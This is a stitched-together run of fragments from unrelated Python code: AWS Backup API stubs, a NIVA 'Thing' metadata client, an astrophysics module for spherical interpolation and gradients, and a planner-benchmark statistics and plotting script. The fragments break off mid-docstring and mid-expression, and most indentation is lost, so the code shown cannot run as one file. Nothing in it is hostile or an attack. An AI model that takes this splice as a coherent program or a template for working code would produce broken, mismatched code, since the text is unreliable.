- **RecoveryPointTags** *(dict) --*
An array of key-value pair strings that are assigned to resources that are associated with this rule when restored from backup.
- *(string) --*
- *(string) --*
- **RuleId** *(string) --*
Uniquely identifies a rule that is used to schedule the backup of a selection of resources.
:type BackupPlanTemplateJson: string
:param BackupPlanTemplateJson: **[REQUIRED]**
A customer-supplied backup plan document in JSON format.
:rtype: dict
:returns:
"""
pass
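    # Hedged usage sketch (illustrative, not part of the generated stubs);
    # assumes a boto3 'backup' client, which this stub file does not construct:
    #
    #     import json
    #     import boto3
    #     client = boto3.client('backup')
    #     plan = {'BackupPlanName': 'daily', 'Rules': []}
    #     response = client.get_backup_plan_from_json(
    #         BackupPlanTemplateJson=json.dumps(plan))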
def get_backup_plan_from_template(self, BackupPlanTemplateId: str) -> Dict:
"""
Returns the template specified by its ``templateId`` as a backup plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate>`_
**Request Syntax**
::
response = client.get_backup_plan_from_template(
BackupPlanTemplateId='string'
)
**Response Syntax**
::
{
'BackupPlanDocument': {
'BackupPlanName': 'string',
'Rules': [
{
'RuleName': 'string',
'TargetBackupVaultName': 'string',
'ScheduleExpression': 'string',
'StartWindowMinutes': 123,
'CompletionWindowMinutes': 123,
'Lifecycle': {
'MoveToColdStorageAfterDays': 123,
'DeleteAfterDays': 123
},
'RecoveryPointTags': {
'string': 'string'
},
'RuleId': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **BackupPlanDocument** *(dict) --*
Returns the body of a backup plan based on the target template, including the name, rules, and backup vault of the plan.
- **BackupPlanName** *(string) --*
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Object oriented interface to NIVA Thing universe
"""
__all__ = ["Thing", "Platform", "Vessel", "Sensor", "TimeSeries",
"FlagTimeSeries", "GPSTrack", "ThingError"]
from dateutil.parser import parse
from .metaflow import get_thing as meta_get_thing
from .metaflow import update_thing as meta_update_thing
from .metaflow import delete_thing as meta_delete_thing
from .metaflow import thing_tree2ts
from .get_data import PyNIVAError
from .tsb import get_signals
class ThingError(PyNIVAError):
"""Exception wrapper for Thing universe
"""
pass
class Thing:
"""Base class for the Thing universe
"""
TTYPE = "thing"
def __init__(self, meta_dict=None, **kwargs):
if meta_dict is None:
meta_dict = {}
for k, v in kwargs.items():
meta_dict[k] = v
if "path" in meta_dict and "name" not in meta_dict:
assert(isinstance(meta_dict["path"], str))
meta_dict["name"] = meta_dict["path"].split("/")[-1]
if "ttype" not in meta_dict:
meta_dict["ttype"] = self.TTYPE
self._meta_dict = meta_dict
def __getattr__(self, attr):
        try:
            return self._meta_dict[attr]
        except KeyError:
            raise AttributeError("Attribute '%s' not found" % (attr,))
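    # All instance state lives in _meta_dict so that as_dict() stays
    # authoritative; __setattr__ below routes every attribute except the
    # _meta_dict slot itself into that dictionary.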
def __setattr__(self, attr, value):
if attr != "_meta_dict":
self.__dict__["_meta_dict"][attr] = value
else:
self.__dict__[attr] = value
def __dir__(self):
return (super().__dir__() + [k for k in self._meta_dict.keys() if not k.startswith("_")])
@classmethod
def _thing_dispatch(cls, thing_data):
if isinstance(thing_data, list):
if len(thing_data) == 0:
return thing_data
elif len(thing_data) == 1:
                assert(isinstance(thing_data[0], dict) and "ttype" in thing_data[0] and thing_data[0]["ttype"] in _valid_types)
                thing_meta = _dispatcher[thing_data[0]["ttype"]](thing_data[0])
elif isinstance(thing_data, list) and len(thing_data) > 1:
thing_meta = [cls._thing_dispatch(t) for t in thing_data]
elif isinstance(thing_data, dict) and "ttype" in thing_data:
            if thing_data["ttype"] not in _valid_types:
                raise ThingError("%s is not a valid thing type" % thing_data["ttype"])
for k,v in thing_data.items():
if isinstance(v, dict) and "ttype" in v:
thing_data[k] = cls._thing_dispatch(v)
elif isinstance(v, list):
c_list = []
for e in v:
if isinstance(e, dict) and "ttype" in e:
c_list.append(cls._thing_dispatch(e))
else:
c_list.append(e)
thing_data[k] = c_list
thing_meta = _dispatcher[thing_data["ttype"]](thing_data)
else:
raise ThingError("Unknown data type passed, must be a dictionary or a list of dictionarise")
return thing_meta
@classmethod
def get_thing(cls, meta_host, params=None, header=None, session=None, **kwargs):
"""Get a Thing instance (or subclass) or a list of instances
according to the supplied parameters.
The data is fetched from the 'metaflow' back-end.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
params: Dictionary with query parameters
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
**kwargs: Named parameters
Returns:
A Thing (or subclass) instance or a list of instances fetched
from 'metaflow' back-end.
"""
if params is None:
c_params = dict()
else:
c_params = params.copy()
for k, v in kwargs.items():
c_params[k] = v
thing_meta = meta_get_thing(meta_host, c_params, header=header, session=session)
return cls._thing_dispatch(thing_meta)
@classmethod
def get_or_create(cls, meta_host, params=None, header=None,
path_only=False, session=None, **kwargs):
"""Get a single Thing instance (or subclass) from
the 'metaflow' back-end or if it doesn't exist
create a new instance.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
params: Dictionary with query parameters
header: HTTP request header (for JWT authentication and encryption)
path_only: If True only the path will be used in the 'metaflow' query
session: Requests session object
**kwargs: Named parameters
Returns:
            A single Thing (or subclass) instance, fetched from the 'metaflow'
            back-end or newly created if no match exists.
"""
if params is None:
c_params = dict()
else:
c_params = params.copy()
if path_only:
assert("path" in c_params or "path" in kwargs)
c_par = {"path": kwargs["path"]} if "path" in kwargs else {"path": params["path"]}
c_thing = cls.get_thing(meta_host, header=header, session=session, **c_par)
else:
c_thing = cls.get_thing(meta_host, params=params, header=header, session=session, **kwargs)
if isinstance(c_thing, list):
            if len(c_thing) > 1:
                raise ThingError("Thing not unique, multiple Things match search")
if len(c_thing) == 0:
# Create new object
for k,v in kwargs.items():
c_params[k] = v
if "ttype" not in c_params:
c_params["ttype"] = cls.TTYPE
c_thing = cls._thing_dispatch(c_params)
return c_thing
@classmethod
def list(cls, meta_host, header=None, session=None, **kwargs):
"""Get a list of Thing instances of the type matching the
caller class and search criteria in 'metaflow'.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
**kwargs: Named parameters
Returns:
            A list of Thing (or subclass) instances matching the search criteria,
            fetched from the 'metaflow' back-end.
Example:
# Get all available Thing instances from 'metaflow'
my_things = Thing.list(meta_host, header=header)
"""
params = {"ttype": cls.TTYPE}
for k, v in kwargs.items():
params[k] = v
t_list = cls.get_thing(meta_host, params=params, header=header, session=session)
return t_list if isinstance(t_list, list) else [t_list,]
@classmethod
def tdict2thing(cls, tdict, parts=False):
"""Dispatcher to create a Thing (or subclass) instance
from a dictionary.
Args:
tdict: Dictionary with parameters, must contain a 'ttype'
parts: If True the method will build a domain model tree if present in tdict
Returns:
A Thing (or subclass) instance
"""
if parts and "parts" in tdict:
tdict["parts"] = [cls.tdict2thing(part) for part in tdict["parts"]]
return _dispatcher[tdict["ttype"]](tdict)
def as_dict(self, shallow=False):
"""Return data of instance as a dictionary.
The data will be JSON serializable
Args:
shallow: if True uuids will be used instead of objects
Returns:
A JSON serializable dictionary representing the Thing instance
"""
def _dict_iter(c_dict):
out_dict = c_dict.copy()
for k in out_dict.keys():
if isinstance(c_dict[k], Thing):
if not shallow and not k == "part_of":
out_dict[k] = out_dict[k].as_dict(shallow)
else:
out_dict[k] = out_dict[k].uuid if hasattr(out_dict[k], "uuid") else out_dict[k].path
elif isinstance(out_dict[k], list):
c_list = []
for e in out_dict[k]:
if isinstance(e, Thing):
if not shallow and not k == "part_of":
c_list.append(e.as_dict())
else:
c_list.append(e.uuid if hasattr(e, "uuid") else e.path)
elif isinstance(e, dict):
c_list.append(_dict_iter(e))
else:
c_list.append(e)
out_dict[k] = c_list
elif isinstance(out_dict[k], dict):
out_dict[k] = _dict_iter(out_dict[k])
else:
pass
return out_dict
return(_dict_iter(self._meta_dict))
def update(self, data=None, **kwargs):
"""Update Thing instance in place
Args:
data: dictionary with new instance data
**kwargs: Named parameters
Returns:
self
"""
if data is None:
meta_dict = {}
else:
meta_dict = data.copy()
for k, v in kwargs.items():
meta_dict[k] = v
for k, v in meta_dict.items():
self._meta_dict[k] = v
return self
def save(self, meta_host, header=None, session=None):
"""Save/update Thing in 'metaflow' meta-data service
Note that the method will also recursively update/save
objects found in self.parts list to ensure 'metaflow' is kept
in a consistent state.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
Returns:
The persisted instance. Note that the returned instance will
be different from the caller instance.
"""
c_parts = self._meta_dict.get("parts", None)
if c_parts is not None:
del(self._meta_dict["parts"])
updated_data = meta_update_thing(meta_host, self.as_dict(shallow=True),
header=header, session=session)
updated_thing = self._thing_dispatch(updated_data)
if c_parts is not None:
# Handle possible inconsistencies in parts
assert(isinstance(c_parts, list))
for p in c_parts:
p.part_of = updated_thing.uuid
p = p.save(meta_host, header=header, session=session)
updated_thing.parts = c_parts
return updated_thing
def delete(self, meta_host, header=None, recursive=True, session=None):
"""Delete the object in meta-data service
        The server-side API makes sure the part_of structure
        remains consistent after the delete.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
recursive: Also delete child objects
session: Requests session object
Returns:
The deleted instance (self).
"""
if recursive:
c_instance = self.get_tree(meta_host, header=header, levels=1, session=session)
c_parts = c_instance.parts if hasattr(c_instance, "parts") else []
for p in c_parts:
p.delete(meta_host, header=header, recursive=recursive, session=session)
if hasattr(self, "parts"):
del(self._meta_dict["parts"])
deleted_data = meta_delete_thing(meta_host, self.as_dict(shallow=True), session=session)
deleted_thing = self._thing_dispatch(deleted_data)
return deleted_thing
def get_tree(self, meta_host, header=None, levels=100, session=None):
"""Get data model tree for Thing instance
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
levels: Maximum tree depth returned
session: Requests session object
Returns:
            Thing instance with children (in the 'parts' attribute) attached
"""
return self.get_thing(meta_host, header=header, uuid=self.uuid, parts=levels, session=session)
class Component(Thing):
"""Component or part of a thing
"""
TTYPE = "component"
pass
class Platform(Thing):
"""Base class for sensor/measurement platforms
"""
TTYPE = "platform"
def get_all_tseries(self, meta_host, header=None, session=None):
"""Method returning all available time series instances
attached to the Platform.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
Returns:
A list of TimeSeries instances attached to the Platform
"""
def _part_uuid2thing(thing, tlookup):
if isinstance(thing, dict):
return tlookup[thing["uuid"]]
if hasattr(thing, "parts") and thing._meta_dict["parts"] is not None:
thing._meta_dict["parts"] = [_part_uuid2thing(part, tlookup) for part in thing.parts]
return tlookup[thing.uuid]
full_thing = self.get_tree(meta_host, header=header, session=session)
thing_tree = full_thing.as_dict()
ts_list = [Thing.tdict2thing(ts) for ts in thing_tree2ts(thing_tree)]
a computed uniform
distribution of points, 'npoints', on that sphere(s). It can return the 'theta,phi' (mollweide)
coordinates of the 'varloc' values as well.
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
np.ndarray: quantity you want to have interpolated on the sphere
radius: float or np.ndarray
The radius of the sphere you want 'varloc' to be interpolated to
fname: None, int
None: default option, will grab current dump
int: Dump number
npoints: int
The number of 'theta and phi' points you want for a projection plot
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
        logvar: bool
            If True, interpolate in log space (var = np.log10(var)) for a better
            fit. The returned var_interpolated is scaled back to linear.
plot_mollweide: bool
If you want returned the theta, phi coordinates of the interpolated values so that it
can be plotted with a projection method
get_igrid: bool
If you want returned the actual grid points (x,y,z) used for the interpolation
Returns
-------
var_interpolated: np.ndarray
The array containing var interpolated at 'radius'
theta_grid: np.ndarray
The array containing the "mollweide" theta points that were interpolated to
phi_grid: np.ndarray
The array containing the "mollweide" phi points that were interpolated to
igrid: np.ndarray
The array containing the x,y,z coordinates of the points that were interpolated to
'''
# I will construct an appropriate igrid and let get_interpolation do the rest
# do we have many radii?
try:
first_r = radius[0]
except (TypeError, IndexError) as e:
# ok, we have an error, it is a single float or int
radius = np.array([radius])
# get the grid to be interpolated to
igrid, theta_grid, phi_grid = self._constantArea_spherical_grid(radius, npoints)
# for mollweide we have to transform these
theta_grid, phi_grid = self._transform_mollweide(theta_grid, phi_grid)
# More checks will be done with get_interpolation
var_interp = self.get_interpolation(varloc, igrid, fname, method, logvar)
# This var_interp and igrid COULD be a flattened array, let's reshape if so
if len(radius) > 1:
# to prevent copying array
igrid.shape = (len(radius),npoints,3)
var_interp.shape = (len(radius),npoints)
# Are we plotting mollweide, and/or returning igrid?
if get_igrid:
if plot_mollweide:
return var_interp, theta_grid, phi_grid, igrid
else:
return var_interp, igrid
else:
if plot_mollweide:
return var_interp, theta_grid, phi_grid
else:
return var_interp
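    # Hedged usage sketch (the varloc 'ux' and the radius are illustrative, and
    # `moms` stands for an instance of this class):
    #
    #     import matplotlib.pyplot as plt
    #     v, th, ph = moms.get_spherical_interpolation('ux', 5000.,
    #                                                  plot_mollweide=True)
    #     ax = plt.subplot(111, projection='mollweide')
    #     ax.scatter(ph, th, c=v, s=1)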
def get_spherical_components(self, ux, uy, uz, fname=None, igrid=None):
'''
Vector quantities are output in the cartesian coordinates but we can transform them to
spherical coordinates using unit vectors. This returns the spherical components of u
Parameters
----------
ux, uy, uz: int, str, np.ndarray
int: integer referring to varloc
str: string referring to quantity varloc
np.ndarray: array with quantities
fname: None, int
None: default option, will grab current dump
int: Dump number
igrid: np.ndarray
If the quantity is not defined on the entire grid we can still convert it if we know the
cartesian points that it is on. Note:
igrid.shape = (len(ux.flatten()),3)
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
Returns
-------
u_spherical: list of np.ndarray
The spherical components of u
'''
# first check if we are using the grid or not
if not isinstance(igrid,np.ndarray):
if not self._grid_jacobian_exists:
# create the grid jacobian, keep this in memory
self._grid_jacobian = self._get_jacobian(self._xc_view,self._yc_view,self._zc_view, self._radius_view)
self._grid_jacobian_exists = True
# local variable to reference internal jacobian
jacobian = self._grid_jacobian
else:
radius = np.sqrt(np.power(igrid[:,2],2.0) + np.power(igrid[:,1],2.0) + np.power(igrid[:,0],2.0))
jacobian = self._get_jacobian(igrid[:,2],igrid[:,1],igrid[:,0],radius)
# first grab quantities if we need to
if not isinstance(ux,np.ndarray):
ux = self._get(ux,fname)
if not isinstance(uy,np.ndarray):
uy = self._get(uy,fname)
if not isinstance(uz,np.ndarray):
uz = self._get(uz,fname)
ur = ux * jacobian[0] + uy * jacobian[1] + uz * jacobian[2]
utheta = ux * jacobian[3] + uy * jacobian[4] + uz * jacobian[5]
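        # the phi unit vector has no z-component, so uz does not contribute to uphi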
uphi = ux * jacobian[6] + uy * jacobian[7]
return [ur, utheta, uphi]
def get(self, varloc, fname=None):
'''
Returns variable var at a specific point in the simulation's time evolution. var is
referenced from 'varloc' which can be a string (referring to var's name that you
specified and instantiation) or an integer referring to whatever[varloc]
IMPORTANT NOTE: This is a copy of the actual data. This is to ensure that a dump's data
will be deleted when new data is deleted i.e we are preserving that there will be no
references!
Parameters
----------
varloc: str, int
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
var: np.ndarray
Variable referenced with 'varloc' as given by MomsData.get() if the MomsData
corresponding to 'fname' exists.
'''
# if fname is not specified use current dump
        if fname is None:
fname = self.what_dump_am_i
        # quick check if we already have the momsdata in memory; if not,
        # grab a new datacube for this dump
        if str(fname) not in self._many_momsdata:
            self._get_dump(fname)
        # This is public, we must give a copy
        try:
            return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)]).copy()
        except KeyError as e:
            err = 'Invalid key for varloc. A list of keys: \n'
            err += ', '.join(sorted(map(str, self._varloc.keys())))
            self._messenger.error(err)
            raise e
def gradient(self, f, fname=None):
'''
Take the gradient of a scalar field in CARTESIAN coordinates. This uses central
differences using points directly on the grid (no interpolation).
Parameters
----------
f: np.ndarray
scalar field defined on the grid
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
grad_f: list of np.ndarray
list containing fx, fy and fz
'''
if not isinstance(f,np.ndarray):
f = self._get(f,fname)
else:
# check len of shape of f
if len(f.shape) != 3:
                err = ('The input f does not have its data formatted as f[z,y,x], '
                       'make sure the shape is ({0},{0},{0})').format(self.moms_ngridpoints)
                self._messenger.error(err)
                raise ValueError(err)
# we use the unique coordinates as the values on the grid (these should have had uniform spacing but don't...)
gradf = np.gradient(f,self._unique_coord,self._unique_coord,self._unique_coord)
# we get fz, fy and then fx, rearrange
gradf.reverse()
return gradf
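    # Hedged example ('rho' is an illustrative varloc; `moms` stands for an
    # instance of this class):
    #
    #     fx, fy, fz = moms.gradient(moms.get('rho'))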
def sphericalHarmonics_format(self, varloc, radius, fname=None, lmax=None, method='trilinear',
get_theta_phi_grids=False, get_igrid=False):
'''
To describe a function on a sphere it can be decomposed into its modes through spherical
harmonics. To do this efficiently, a particular theta, phi grid is used which is different
from what the self.get_spherical_interpolation uses. Keep in mind that for a given lmax:
The number of theta subdivisions across its domain is N = 2*(l+1)
The number of phi subdivisions across its domain is 2*N = 4*(l+1)
The number of points being interpolated to is npoints = 8*(l+1)**2
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
np.ndarray: quantity you want to have interpolated on the sphere
radius: float
The radius of the sphere you want 'varloc' to be interpolated to
fname: None, int
None: default option, will grab current dump
int: Dump number
lmax: None, int
None: default option will use the maximum resolvable l for this 'radius' and moments
data grid size, i.e lmax = pi * radius / self.moms_gridresolution
int: The maximum l value that you wish to use
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
get_theta_phi_grids: bool
            If you want returned the theta, phi coordinates of the interpolated values so that
            they can be plotted with a projection method
prob][0]
for prob in solved_by_md:
md_mapping[prob] = [x for x in filter_settings(good_data, MIN_DEORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
for prob in solved_by_mr:
mr_mapping[prob] = [x for x in filter_settings(good_data, MIN_REORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
for prob in solved_by_md:
rx_mapping[prob] = [x for x in filter_settings(good_data, MIN_DEORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
solved_action_increase = [prob for prob in solved_by_lcp if float(lcp_mapping[prob][9]) > float(lcp_mapping[prob][10])]
lcp_action_decrease = [1 - (float(lcp_mapping[prob][10]) / float(lcp_mapping[prob][9])) for prob in solved_action_increase]
lcp_action_decrease_all = [1 - (float(lcp_mapping[prob][10]) / float(lcp_mapping[prob][9])) for prob in solved_by_lcp]
def flex(num_acts, num_orders):
def nCr(n,r):
import math
f = math.factorial
return f(n) / f(r) / f(n-r)
return 1.0 - (float(num_orders) / float(nCr(int(num_acts), 2)))
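    # flex = 1 - |orderings| / C(num_acts, 2): the fraction of action pairs left
    # unordered by the plan (higher means a more flexible partial-order plan)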
lcp_flex = [flex(float(lcp_mapping[prob][10]), float(lcp_mapping[prob][12])) for prob in solved_by_lcp]
md_flex = [flex(float(md_mapping[prob][10]), float(md_mapping[prob][12])) for prob in solved_by_md]
mr_flex = [flex(float(mr_mapping[prob][10]), float(mr_mapping[prob][12])) for prob in solved_by_mr]
rx_flex = [flex(float(rx_mapping[prob][9]), float(rx_mapping[prob][11])) for prob in solved_by_md]
#lcp_flex = [flex(float(lcp_mapping[prob][10]), float(lcp_mapping[prob][12])) for prob in solved_by_all]
#md_flex = [flex(float(md_mapping[prob][10]), float(md_mapping[prob][12])) for prob in solved_by_all]
#mr_flex = [flex(float(mr_mapping[prob][10]), float(mr_mapping[prob][12])) for prob in solved_by_all]
#rx_flex = [flex(float(rx_mapping[prob][9]), float(rx_mapping[prob][11])) for prob in solved_by_all]
lcp_opt = [{'True':1,'False':0}[lcp_mapping[prob][13]] for prob in solved_by_lcp]
md_opt = [{'True':1,'False':0}[md_mapping[prob][13]] for prob in solved_by_md]
mr_opt = [{'True':1,'False':0}[mr_mapping[prob][13]] for prob in solved_by_mr]
print("\nAll problems:\t %d" % len(all_problems))
print("Solved by all:\t %d" % len(solved_by_all))
print(" -{ Action Improvement (only improvements) }-")
print("Occurrences:\t %d / %d = %f" % (len(solved_action_increase),
len(solved_by_lcp),
float(len(solved_action_increase)) / float(len(solved_by_lcp))))
print("Arith. mean:\t %f +/- %f" % (mean(lcp_action_decrease), std(lcp_action_decrease)))
print("Geometric mean:\t %f" % product(lcp_action_decrease)**(1.0 / len(lcp_action_decrease)))
print("\n -{ Action Improvement (all) }-")
print("Occurrences:\t %d" % len(solved_by_lcp))
print("Arith. mean:\t %f +/- %f" % (mean(lcp_action_decrease_all), std(lcp_action_decrease_all)))
print("Geometric mean:\t %f" % product(lcp_action_decrease_all)**(1.0 / len(lcp_action_decrease_all)))
print("\n -{ Average Flex (Arithmetic) }-")
print("LCP (%d): %f +/- %f" % (len(lcp_flex), mean(lcp_flex), std(lcp_flex)))
print("MR (%d): %f +/- %f" % (len(mr_flex), mean(mr_flex), std(mr_flex)))
print("MD (%d): %f +/- %f" % (len(md_flex), mean(md_flex), std(md_flex)))
print("RX (%d): %f +/- %f" % (len(rx_flex), mean(rx_flex), std(rx_flex)))
print("\n -{ Average Flex (Geometric) }-")
print("LCP (%d): %f" % (len(lcp_flex), product(lcp_flex)**(1.0 / len(lcp_flex))))
print("MR (%d): %f" % (len(mr_flex), product(mr_flex)**(1.0 / len(mr_flex))))
print("MD (%d): %f" % (len(md_flex), product(md_flex)**(1.0 / len(md_flex))))
print("RX (%d): %f" % (len(rx_flex), product(rx_flex)**(1.0 / len(rx_flex))))
print("\n -{ Instances Proved Optimal }-")
print("LCP: %d / %d = %f" % (sum(lcp_opt), len(lcp_flex), float(sum(lcp_opt)) / float(len(lcp_flex))))
print("MR: %d / %d = %f" % (sum(mr_opt), len(mr_flex), float(sum(mr_opt)) / float(len(mr_flex))))
print("MD: %d / %d = %f" % (sum(md_opt), len(md_flex), float(sum(md_opt)) / float(len(md_flex))))
#print " -{ Mean increase actions and constraints }-"
#print "lcp: (%f +- %f) / (%f +- %f)" % (mean(lcp_action_increase),
# std(lcp_action_increase),
# mean(lcp_ordering_increase),
# std(lcp_ordering_increase))
#print "md: (%f +- %f)" % (mean(md_ordering_increase),
# std(md_ordering_increase))
#print "mr: (%f +- %f)" % (mean(mr_ordering_increase),
# std(mr_ordering_increase))
print()
def compare_planners(counted_data, uncounted_data):
uncounted_ff = filter_settings(uncounted_data[0], LCP)
uncounted_popf = filter_settings(uncounted_data[1], LCP)
_solved_ff = set(["%s-%s" % (item[0], item[1]) for item in [x for x in uncounted_ff if GOOD == get_execution_status(x)]])
_solved_popf = set(["%s-%s" % (item[0], item[1]) for item in [x for x in uncounted_popf if GOOD == get_execution_status(x)]])
mutual_solved = _solved_ff & _solved_popf
solved_ff = [x for x in uncounted_ff if ("%s-%s" % (x[0], x[1])) in mutual_solved]
solved_popf = [x for x in uncounted_popf if ("%s-%s" % (x[0], x[1])) in mutual_solved]
ff_results = {}
popf_results = {}
for line in solved_ff:
ff_results["%s-%s" % (line[0], line[1])] = line
for line in solved_popf:
popf_results["%s-%s" % (line[0], line[1])] = line
action_total = 0.0
ordering_total = 0.0
action_total_ff = 0.0
action_total_popf = 0.0
ordering_total_ff = 0.0
ordering_total_popf = 0.0
print("")
popf_bet = 0
ff_bet = 0
for prob in mutual_solved:
if float(popf_results[prob][12]) > float(ff_results[prob][12]):
ff_bet += 1
if float(popf_results[prob][12]) < float(ff_results[prob][12]):
popf_bet += 1
action_total += float(ff_results[prob][10]) / float(popf_results[prob][10])
ordering_total += float(ff_results[prob][12]) / float(popf_results[prob][12])
action_total_ff += float(ff_results[prob][10]) / float(ff_results[prob][9])
action_total_popf += float(popf_results[prob][10]) / float(popf_results[prob][9])
ordering_total_ff += float(ff_results[prob][12]) / float(ff_results[prob][11])
ordering_total_popf += float(popf_results[prob][12]) / float(popf_results[prob][11])
print("\nMean Relative Action: %f" % (action_total / float(len(mutual_solved))))
print("Mean Relative Ordering: %f" % (ordering_total / float(len(mutual_solved))))
print("POPF better / worse: %d / %d" % (popf_bet, ff_bet))
print("Mean Relative FF Action: %f" % (action_total_ff / float(len(mutual_solved))))
print("Mean Relative POPF Action: %f" % (action_total_popf / float(len(mutual_solved))))
print("Mean Relative FF Ordering: %f" % (ordering_total_ff / float(len(mutual_solved))))
print("Mean Relative POPF Ordering: %f" % (ordering_total_popf / float(len(mutual_solved))))
print("")
print("FF Solved: %d / %d" % (len(_solved_ff), len(set(["%s-%s" % (item[0], item[1]) for item in uncounted_ff]))))
print("POPF Solved: %d / %d" % (len(_solved_popf), len(set(["%s-%s" % (item[0], item[1]) for item in uncounted_popf]))))
print("Mutually Solved: %d" % len(mutual_solved))
print("")
def do_plotalltimes():
all_data = fetch_all_data()[1][0]
good_data = [x for x in all_data if GOOD == get_execution_status(x)]
kk_data = [x for x in [float(item[5]) for item in filter_settings(all_data, LCP)] if x <= 600]
md_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_DEORDERING)] if x <= 1801]
mr_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_REORDERING)] if x <= 1801]
lcp_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, LCP)] if x <= 1801]
print("Under 10: %d / %d" % (len([x for x in md_data + mr_data + lcp_data if x < 10]), len(md_data + mr_data + lcp_data)))
x1,y1 = create_time_profile(kk_data)
x2,y2 = create_time_profile(md_data)
x3,y3 = create_time_profile(mr_data)
x4,y4 = create_time_profile(lcp_data)
plot([x1,x2,x4,x3], [y1,y2,y4,y3], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True,
xyline = False, names = ['RX', 'MD', 'MCLCP', 'MR'], x_log = True, col = False)
def mip_vs_sat4j(sat4j_data, mip_data):
good_data = [x for x in sat4j_data if GOOD == get_execution_status(x)]
mr_data = [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_REORDERING)]
mip_data = [float(item[2]) + float(item[3]) for item in [x for x in mip_data if float(x[3]) > 0]]
x1,y1 = create_time_profile(mr_data)
x2,y2 = create_time_profile(mip_data)
#print len(x1)
#print len(x2)
print("x1 = %s" % str(x1))
print("y1 = %s" % str(y1))
print("x2 = %s" % str(x2))
print("y2 = %s" % str(y2))
print('plot([x1,x2], [y1,y2], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True, xyline = False, names = ["MR", "MIP"], x_log = True, col = False)')
for i in range(len(x1)):
print("MR,%f,%f" % (x1[i], y1[i]))
for i in range(len(x2)):
print("MIP,%f,%f" % (x2[i], y2[i]))
plot([x1,x2], [y1,y2], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True,
xyline = False, names = ['MR', 'MILP'], x_log = True, col = False)
def fetch_all_data():
all_counted_data = ([], [])
all_uncounted_data = ([], [])
for dom in GOOD_DOMAINS:
new_data = get_data(dom, True)
all_counted_data[0].extend(new_data[0])
all_counted_data[1].extend(new_data[1])
new_data = get_data(dom, False)
all_uncounted_data[0].extend(new_data[0])
all_uncounted_data[1].extend(new_data[1])
return all_counted_data, all_uncounted_data
if __name__ == '__main__':
import os
myargs, flags = get_opts()
if '-summary' in myargs:
if 'all' == myargs['-summary']:
all_counted_data, all_uncounted_data = fetch_all_data()
print("\n { FF }")
print_summary(all_counted_data[0], all_uncounted_data[0])
#print "\n\n { POPF }"
#print_summary(all_counted_data[1], all_uncounted_data[1])
else:
print("\n { FF }")
print_summary(get_data(myargs['-summary'], True)[0], get_data(myargs['-summary'], False)[0])
#print "\n\n { POPF }"
#print_summary(get_data(myargs['-summary'], True)[1], get_data(myargs['-summary'], False)[1])
elif '-lcpstats' in myargs:
if 'all' == myargs['-lcpstats']:
all_counted_data, all_uncounted_data = fetch_all_data()
print("\n { FF }")
lcp_stats(all_counted_data[0], all_uncounted_data[0])
print("\n\n { POPF }")
lcp_stats(all_counted_data[1], all_uncounted_data[1])
else:
print("\n { FF }")
lcp_stats(get_data(myargs['-lcpstats'], True)[0], get_data(myargs['-lcpstats'], False)[0])
print("\n\n { POPF }")
lcp_stats(get_data(myargs['-lcpstats'], True)[1], get_data(myargs['-lcpstats'], False)[1])
elif '-plotlcplinears' in myargs:
if 'all' == myargs['-plotlcplinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_relinears(all_counted_data[0], LCP, disable_ones = False)
else:
plot_relinears(get_data(myargs['-plotlcplinears'], True)[0], LCP, disable_ones = False)
elif '-plotlinears' in myargs:
if 'all' == myargs['-plotlinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_linears(all_counted_data[0])
else:
plot_linears(get_data(myargs['-plotlinears'], True)[0])
elif '-plottiming' in myargs:
if 'all' == myargs['-plottiming']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_timing(all_uncounted_data[0])
else:
plot_timing(get_data(myargs['-plottiming'], False)[0])
elif '-plotminrelinears' in myargs:
if 'all' == myargs['-plotminrelinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_relinears(all_counted_data[0], MIN_REORDERING)
else:
plot_relinears(get_data(myargs['-plotminrelinears'], True)[0], MIN_REORDERING)
elif '-timing' in myargs:
if 'all' == myargs['-timing']:
all_counted_data, all_uncounted_data = fetch_all_data()
compute_timing(all_uncounted_data[0])
else:
compute_timing(get_data(myargs['-timing'], False)[0])
elif '-meanactconst' in myargs:
if 'all' == myargs['-meanactconst']:
all_counted_data, all_uncounted_data = fetch_all_data()
compute_mean_act_const(all_uncounted_data[0])
else:
compute_mean_act_const(get_data(myargs['-meanactconst'], False)[0])
